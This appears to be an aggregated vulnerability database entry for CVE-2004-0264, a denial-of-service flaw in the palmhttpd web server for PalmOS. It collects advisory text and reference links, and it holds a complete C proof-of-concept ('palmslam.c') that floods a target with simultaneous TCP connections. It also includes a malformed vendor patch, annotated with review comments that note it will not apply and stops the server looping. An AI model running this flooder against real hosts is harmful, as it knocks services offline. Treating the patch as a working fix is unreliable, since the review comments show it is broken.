CVE-2004-0264
CVSS 5.0
Published: 2004-11-23 00:00:00
Last modified: 2016-10-17 22:42:42

[Original] palmhttpd for PalmOS allows remote attackers to cause a denial of service (crash) by establishing two simultaneous HTTP connections, which exceeds the PalmOS accept queue.


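[CNNVD] Shaun2k2 Palmhttpd Server remote denial of service vulnerability (CNNVD-200411-148)

Palmhttpd server is a simple web server for Palm systems written by Jim Rees.
The Palmhttpd service does not handle multiple connections correctly, and a remote attacker can exploit this flaw to cause a denial of service.
PalmOS can accept only one client connection, but 'httpd' implements a while(1) loop that calls accept() on connections, so httpd can accept multiple connections. An attacker who opens multiple connections can trigger "Fatal Error, NetStack1.c overflowed accept queue", resulting in a denial of service.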
        

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:shaun2k2:palmhttpd:3.0
cpe:/a:jim_rees:jim_rees_httpd:palmos

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0264
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0264
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-148
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=107634638201570&w=2
(UNKNOWN)  BUGTRAQ  20040208 PalmOS httpd accept() queue overflow DoS vulnerability.
http://www.securityfocus.com/bid/9608
(VENDOR_ADVISORY)  BID  9608
http://xforce.iss.net/xforce/xfdb/15090
(VENDOR_ADVISORY)  XF  palmhttpd-accept-bo(15090)

- Vulnerability information

Shaun2k2 Palmhttpd Server remote denial of service vulnerability
Medium severity  Buffer overflow
2004-11-23 00:00:00 2006-08-31 00:00:00
Remote
        
        


- Vulnerability information (23665)

Shaun2k2 Palmhttpd Server 3.0 Remote Denial of Service Vulnerability (EDBID:23665)
windows dos
2004-02-09 Verified
0 shaun2k2
N/A
source: http://www.securityfocus.com/bid/9608/info

It has been reported that Palmhttpd server may be prone to a remote denial of service vulnerability when an attacker attempts to establish multiple connections with the software. This issue occurs because PalmOS can only handle one client connection.

Shaun2k2 Palmhttpd version 3.0 and prior may be prone to this issue. Since the application is an extension of the 'httpd for PalmOS' server by Jim Rees, it is assumed that 'httpd for PalmOS' is vulnerable as well; however, this product has been discontinued.

---palmslam.c
/* PalmOS httpd accept queue overflow PoC exploit.
 * Compile: gcc palmslam.c -o palmslam
 *
 * -shaun2k2
 */
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#define MAX_CON 1025
int main(int argc, char *argv[]) {
        if(argc < 3) {
                printf("Usage: palmslam <host> <port>\n");
                exit(-1);
        }

        int sock[MAX_CON];
        int i;
        struct sockaddr_in dest[MAX_CON];
        struct hostent *host;
        /* gethostbyname() returns NULL on failure, not -1 */
        if((host = gethostbyname(argv[1])) == NULL) {
                printf("Couldn't resolve %s!\n", argv[1]);
                exit(-1);
        }

        /* i < MAX_CON keeps the index inside sock[] and dest[] */
        for(i = 0; i < MAX_CON; i++) {
                if((sock[i] = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                        printf("Couldn't create socket!\n");
                        exit(-1);
                }

                dest[i].sin_family = AF_INET;
                dest[i].sin_port = htons(atoi(argv[2]));
                dest[i].sin_addr = *((struct in_addr *)host->h_addr);

                if(connect(sock[i], (struct sockaddr *)&dest[i], sizeof(struct sockaddr)) == -1) {
                        printf("Couldn't connect to %s on port %s!\n", argv[1], argv[2]);
                        exit(-1);
                }

                printf("%d : Connected!\n", i);
        }
        return(0);
}

- Vulnerability information

3892
palmhttpd Multiple Connection DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- Vulnerability description

palmhttpd contains a flaw that may allow a remote denial of service. The issue is triggered when multiple connections are established, and will result in loss of availability for the platform.

- Timeline

2004-02-08 2004-02-08
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Shaun Colley has released a patch to address this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Shaun2k2 Palmhttpd Server Remote Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 9608
Yes No
2004-02-09 12:00:00 2009-07-12 02:06:00
The disclosure of this issue has been credited to the vendor shaun2k2 <shaunige@yahoo.co.uk>.

- Affected software versions

shaun2k2 palmhttpd 3.0
Jim Rees httpd for PalmOS


- Exploit

The following proof of concept exploit code has been supplied:

- Solution

The vendor has released the following patch to address this issue:
---httpd.patch
--- httpd.c 2004-01-14 17:21:41.000000000 +0000
+++ httpd.1.c 2004-02-08 17:13:33.000000000 +0000
@@ -391,8 +391,15 @@
NetLibAddrINToA(AppNetRefnum,
ifinfo.param.interfaceInfo.ipAddr, host);
printf("Listening on %s\n", host);

- while (1) {
- if (f) {
+ /* Here is where the bug manifests: PalmOS can
only take 1 client
+ * connection (according to even the PalmOS
programming documentation),
+ * but this loop accept()s connections forever.
The loop is now commented
+ * out, fixing the bug.
+ * -Shaun2k2
+ */
+
+ /*while (1) {*/
+ if (f) {
xclose(f);
f = NULL;
}
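Review bot: Commenting out `while (1) {` makes the accept path run once, so the server stops serving after its first client; the crash is traded for a server that has to be restarted per connection, and the new comment should state that. If the platform limit is one connection at a time, it is worth checking whether the overflow comes from the loop itself or from connections queued while one is being handled, since the retained `if (f) { xclose(f); f = NULL; }` already releases the previous connection before the next pass. The added comment lines are also wrapped without a leading `+` ("only take 1 client", "programming documentation),", "The loop is now commented"), so the patch will not apply as posted.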
@@ -507,7 +514,7 @@
}

printf("stopped\n");
-}
+/*}*/

char html0[] = "HTTP/1.0 200 OK\nMIME-version:
1.0\nContent-type: %s\n\n";
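Review bot: The `}` replaced by `/*}*/` is the last brace before the `char html0[]` definition, with another `}` and `printf("stopped\n");` just above it; confirm that it closes the `while (1)` and not the enclosing function, otherwise `printf("stopped\n");` ends up outside the function body. Deleting the loop lines and re-indenting the body, instead of leaving `/*while (1) {*/` and `/*}*/` as commented-out code, would make the brace pairing obvious.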
---
